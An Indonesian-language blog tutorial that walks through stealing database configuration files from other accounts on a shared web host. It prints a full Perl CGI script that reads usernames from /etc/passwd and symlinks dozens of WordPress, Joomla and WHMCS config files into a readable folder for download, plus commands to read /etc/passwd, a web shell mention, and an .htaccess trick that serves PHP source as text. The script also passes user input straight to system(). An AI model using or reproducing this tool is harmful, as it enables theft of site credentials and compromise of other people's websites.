0 Symlink Config Stealer

Hallo para Bloger.. kali ini saya akan menjelaskan step by step bagaimana kita mendapatkan Config Website dengan memanfaatkan symlink / Config Stealer.. mungkin udah ada yang bisa untuk mastah-mastah :D .. tapi saya akan share aja buat newbie kek saya :D .. langsung aja ya kita ke penjelasan nya.. :D

1. Upload script perl Symlink ini terserah mo di mana .. kasih nama symlink.pl ..
misalnya target kita adalah.. http://caricara.com/ ini scriptnya :
     

#!/usr/bin/perl -I/usr/local/bandmin

print "Content-type: text/html\n\n";

print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Language" content="en-us" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>CBF Syndrom</title>

<style type="text/css">

.newStyle1 {

font-family: Tahoma;

font-size: x-large;

color: #000000;

background-color: #C0C0C0;

text-align: center;

}

</style>

</head>

';

sub lil{

($user) = @_;

$msr = qx{pwd};

$kola=$msr."/".$user;

$kola=~s/\n//g;

symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'.txt');

symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'1.txt');

symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt');

symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'3.txt');

symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt');

symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt');

symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wp.txt');

symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp.txt');

symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt');

symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt');

symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt');

symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'9.txt');

symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt');

symlink('/home/'.$user.'/public_html/include/config.php',$kola.'12.txt');

symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla.txt');

symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'15.txt');

symlink('/home/'.$user.'/public_html/whmc/configuration.php',$kola.'16.txt');

symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'17.txt');

symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'-whmcs.txt');

symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');

symlink('/home/'.$user.'/public_html/submitticket.php',$kola.'-whmcs2.txt');

symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-clients.txt');

symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-client.txt');

symlink('/home/'.$user.'/public_html/clientes/configuration.php',$kola.'-clients.txt');

symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt');

symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.'-billing.txt');

symlink('/home/'.$user.'/public_html/my/configuration.php',$kola.'-billing.txt');

symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.'-billing.txt');

symlink('/home/'.$user.'/public_html/painel/configuration.php',$kola.'-painel.txt');

symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');

symlink('/home/'.$user.'/public_html/ordernow/configuration.php',$kola.'-ordernow.txt');

symlink('/home/'.$user.'/public_html/order/configuration.php',$kola.'-order.txt');

symlink('/home/'.$user.'/public_html/orders/configuration.php',$kola.'-orders.txt');

symlink('/home/'.$user.'/public_html/host/hosts/configuration.php',$kola.'-hosts.txt');

symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');

symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$kola.'-webhosting.txt');

symlink('/home/'.$user.'/public_html/lib/config.php',$kola.'-balitbang.txt');

}

if ($ENV{'REQUEST_METHOD'} eq 'POST') {

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

} else {

$buffer = $ENV{'QUERY_STRING'};

}

@pairs = split(/&/, $buffer);

foreach $pair (@pairs) {

($name, $value) = split(/=/, $pair);

$name =~ tr/+/ /;

$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

$value =~ tr/+/ /;

$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

$FORM{$name} = $value;

}

if ($FORM{pass} eq ""){

print '

<body>

<p>CBF</p>

<p>:::Syndrom2211:::</p>

<form method="post">

<textarea name="pass" style="width: 543px; height: 420px"></textarea>

<br />

<input name="tar" type="text" style="width: 212px" /><br />

<input name="Submit1" type="submit" value="submit" style="width: 99px" /><br />

</form>';

}else{

@lines =<$FORM{pass}>;

$y = @lines;

open (MYFILE, ">tar.tmp");

print MYFILE "tar -czf ".$FORM{tar}.".tar ";

for ($ka=0;$ka<$y;$ka++){

while(@lines[$ka] =~ m/(.*?):x:/g){

&lil($1);

print MYFILE $1.".txt ";

for($kd=1;$kd<18;$kd++){

print MYFILE $1.$kd.".txt ";

}

}

}

print'<body>

<p>Done !!</p>

<p>&nbsp;</p>';

if($FORM{tar} ne ""){

open(INFO, "tar.tmp");

@lines =<INFO> ;

close(INFO);

system(@lines);

print'<p><a href="'.$FORM{tar}.'.tar">Click here 2 download tar file</a></p>';

}

}

print"

</body>

</html>";

2. Misalkan kita buat folder dan menyimpan symlink nya di folder /dam .. misalnya http://caricara.com/dam/ Kemudian rubah chmod Symlinknya di command line.. ini command nya:

chmod 755 symlink.pl

Note: 
- Jika command line tidak berfungsi alias popen Disabled! .. maka anda harus upload command line seperti CGI-Telnet dan yang lain nya.. :D
- Jika command line tidak berfungsi alias popen disabled! .. maka anda harus upload chmod script php nya.. ini scriptnya:

<?php
chmod("symlink.php", 0755);
?>

Save.. kemudian upload dan jalankan Filenya..

3. Jika sudah berhasil maka akan nampak seperti gambar di bawah ini:

Bisa anda klik jika tidak terlihat ..

4.Kita beralih ke command line .. tulis di command line cat /etc/passwd/

5.Nah nanti muncul yang root-root kek gitu.. tampilan nya seperti ini yang saya jalankan di CGI-telnet

Bisa anda klik jika tidak terlihat ..

6. Copy Semua script itu yang sudah kita cat etc/passwd, terus pastekan ke cara nomor 3.

7. Jika Sudah nanti akan terlihat tulisan Done! .. dan itu berhasil.. terus kita buka saja direktorinya http://caricara.com/dam/ , dan di situ banyak File Configuration dari Wordpress, Joomla , Balitbang dan sebagainya.. bisa terlihat seperti ini:

Bisa di klik jika tidak terlihat..

8. Jika misalnya http://caricara.com/dam/ <<< Forbidden dan Config filenya.. mungkin bisa menggunakan .htaccess , ini scriptnya upload di direktori /dam:

Options Indexes FollowSymLinks
DirectoryIndex syndromganteng.php
AddType txt .php Addhandler txt .php

8. Selesai... tinggal kita menggunakan etika kita saja apakah anda akan menghancurkan? atau mengingatkan? itu semua tergantung kepada anda.. :D

Artikel Terkait